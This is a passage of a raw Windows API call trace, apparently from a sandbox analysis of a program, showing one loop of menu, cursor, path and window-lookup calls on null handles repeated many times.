(hMenu=0x0, nPos=-1) returned 0x0 [0027.487] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.487] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.487] GetStockObject (i=6) returned 0x1b00018 [0027.487] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.487] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.487] PathFileExistsW (pszPath=0x0) returned 0 [0027.487] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.487] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.487] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.487] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.487] GetMenu (hWnd=0x0) returned 0x0 [0027.487] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.487] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.487] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.487] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.487] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.487] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.487] GetStockObject (i=6) returned 0x1b00018 [0027.487] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.487] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.487] PathFileExistsW (pszPath=0x0) returned 0 [0027.487] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.487] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.488] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.488] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.488] GetMenu (hWnd=0x0) returned 0x0 [0027.488] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x14d) returned -1 [0027.488] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.488] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.488] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.488] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.488] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.488] GetStockObject (i=6) returned 0x1b00018 [0027.488] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.488] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.488] PathFileExistsW (pszPath=0x0) returned 0 [0027.488] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.488] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.488] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.488] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.488] GetMenu (hWnd=0x0) returned 0x0 [0027.488] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.488] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.488] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.488] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.488] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.488] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.488] GetStockObject (i=6) returned 0x1b00018 [0027.488] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.488] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.488] PathFileExistsW (pszPath=0x0) returned 0 [0027.488] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.488] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.488] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.488] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.488] GetMenu (hWnd=0x0) returned 0x0 [0027.488] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.489] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.489] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.489] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.489] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.489] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.489] GetStockObject (i=6) returned 0x1b00018 [0027.489] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.489] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.489] PathFileExistsW (pszPath=0x0) returned 0 [0027.489] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.489] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.489] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.489] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.489] GetMenu (hWnd=0x0) returned 0x0 [0027.489] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.489] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.489] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.489] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.489] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.489] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.489] GetStockObject (i=6) returned 0x1b00018 [0027.489] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.489] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.489] PathFileExistsW (pszPath=0x0) returned 0 [0027.489] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.489] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.489] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.489] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.489] GetMenu (hWnd=0x0) returned 0x0 [0027.489] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.489] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.489] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.489] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.490] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.490] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.490] GetStockObject (i=6) returned 0x1b00018 [0027.490] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.490] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.490] PathFileExistsW (pszPath=0x0) returned 0 [0027.490] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.490] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.490] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.490] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.490] GetMenu (hWnd=0x0) returned 0x0 [0027.490] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x544) returned -1 [0027.490] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.490] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.490] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.490] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.490] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.490] GetStockObject (i=6) returned 0x1b00018 [0027.490] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.490] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.490] PathFileExistsW (pszPath=0x0) returned 0 [0027.490] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.490] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.490] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.490] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.490] GetMenu (hWnd=0x0) returned 0x0 [0027.490] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.490] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.490] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.490] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.490] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.490] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.490] GetStockObject (i=6) returned 0x1b00018 [0027.491] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.491] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.491] PathFileExistsW (pszPath=0x0) returned 0 [0027.491] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.491] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.491] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.491] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.491] GetMenu (hWnd=0x0) returned 0x0 [0027.491] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.491] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.491] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.491] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.491] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.491] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.491] GetStockObject (i=6) returned 0x1b00018 [0027.491] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.491] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.491] PathFileExistsW (pszPath=0x0) returned 0 [0027.491] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.491] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.491] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.491] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.491] GetMenu (hWnd=0x0) returned 0x0 [0027.491] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.491] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.491] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.491] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.491] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.491] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.491] GetStockObject (i=6) returned 0x1b00018 [0027.491] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.491] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.491] PathFileExistsW (pszPath=0x0) returned 0 [0027.491] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.491] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.492] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.492] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.492] GetMenu (hWnd=0x0) returned 0x0 [0027.492] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.492] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.492] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.492] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.492] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.492] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.492] GetStockObject (i=6) returned 0x1b00018 [0027.492] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.492] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.492] PathFileExistsW (pszPath=0x0) returned 0 [0027.492] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.492] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.492] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.492] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.492] GetMenu (hWnd=0x0) returned 0x0 [0027.492] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1d0) returned -1 [0027.492] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.492] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.492] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.492] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.492] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.492] GetStockObject (i=6) returned 0x1b00018 [0027.492] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.492] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.492] PathFileExistsW (pszPath=0x0) returned 0 [0027.492] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.492] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.492] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.492] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.492] GetMenu (hWnd=0x0) returned 0x0 [0027.493] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.493] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.493] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.493] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.493] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.493] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.493] GetStockObject (i=6) returned 0x1b00018 [0027.493] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.493] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.493] PathFileExistsW (pszPath=0x0) returned 0 [0027.493] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.493] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.493] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.493] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.493] GetMenu (hWnd=0x0) returned 0x0 [0027.493] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.493] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.493] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.493] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.493] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.493] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.493] GetStockObject (i=6) returned 0x1b00018 [0027.493] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.493] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.493] PathFileExistsW (pszPath=0x0) returned 0 [0027.493] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.493] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.493] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.493] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.493] GetMenu (hWnd=0x0) returned 0x0 [0027.493] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.493] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.493] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.494] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.494] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.494] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.494] GetStockObject (i=6) returned 0x1b00018 [0027.494] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.494] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.494] PathFileExistsW (pszPath=0x0) returned 0 [0027.494] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.494] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.494] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.494] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.494] GetMenu (hWnd=0x0) returned 0x0 [0027.494] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.494] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.494] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.494] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.494] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.494] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.494] GetStockObject (i=6) returned 0x1b00018 [0027.494] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.494] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.494] PathFileExistsW (pszPath=0x0) returned 0 [0027.494] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.494] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.494] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.494] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.494] GetMenu (hWnd=0x0) returned 0x0 [0027.494] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1) returned -1 [0027.494] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.494] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.494] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.494] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.494] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.495] GetStockObject (i=6) returned 0x1b00018 [0027.495] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.495] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.495] PathFileExistsW (pszPath=0x0) returned 0 [0027.495] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.495] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.495] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.495] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.495] GetMenu (hWnd=0x0) returned 0x0 [0027.495] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.495] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.495] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.495] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.495] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.495] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.495] GetStockObject (i=6) returned 0x1b00018 [0027.495] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.495] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.495] PathFileExistsW (pszPath=0x0) returned 0 [0027.495] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.495] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.495] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.495] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.495] GetMenu (hWnd=0x0) returned 0x0 [0027.495] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.495] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.495] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.495] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.495] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.495] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.495] GetStockObject (i=6) returned 0x1b00018 [0027.495] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.495] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.496] PathFileExistsW (pszPath=0x0) returned 0 [0027.496] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.496] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.496] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.496] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.496] GetMenu (hWnd=0x0) returned 0x0 [0027.496] 